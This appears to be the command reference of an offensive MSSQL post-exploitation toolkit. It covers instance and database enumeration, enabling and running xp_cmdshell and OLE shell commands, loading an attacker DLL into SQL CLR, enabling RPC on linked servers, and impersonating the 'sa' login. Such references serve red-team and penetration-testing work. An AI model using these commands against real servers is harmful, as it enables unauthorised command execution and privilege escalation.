| Command | Usage | Note |
|---|---|---|
sql-1434udp | sql-1434udp [target] | Depending SQLBrowser service running you might collect basic information without having roles |
sql-info | sql-info [target] | Depending on roles, collect more information |
sql-whoami | sql-whoami [target] | Check your roles and permissions on the instance |
sql-query | sql-query [target] "[query]"<br> | Execute a query directly |
sql-databases | sql-databases [target] | Enumerate databases |
sql-tables | sql-tables [target] [database] | Enumerate tables |
sql-columns | sql-columns [target] [database] [table] | Enumerate columns |
sql-search | sql-search [target] "[pattern]" | Search for columns in the database that match a filter |
sql-enablexp | sql-enablexp [target] | Enable xp_cmdshell |
sql-xpcmd | sql-xpcmd [target] "[command]" | Execute xp_cmdshell commands |
sql-disablexp | sql-disablexp [target] | Disable xp_cmdshell |
sql-enableole | sql-enableole [target] | Enable OLE |
sql-olecmd | sql-olecmd [target] "[command]" | Execute OLE commands - wraps "cmd /c" |
sql-disableole | sql-disableole [target] | Disable OLE |
sql-enableclr | sql-enableclr [target] | Enable SQL CLR |
sql-clr | sql-clr [target] [C:\ATTACKER\evil.dll] [EvilFunctionName] | Load assembly in CLR<br> |
sql-disableclr | sql-disableclr [target] | Disable SQL CLR |
sql-links | sql-links [target] | Enumerate Linked Servers |
sql-checkrpc | sql-checkrpc [target] | RPC needs to be enabled on the linked server to call stored procedures. |
sql-enablerpc | sql-enablerpc [target] [target-link] | Enable RPC |
Impersonation
sql-query [target] "EXECUTE AS LOGIN = 'sa' [query]; "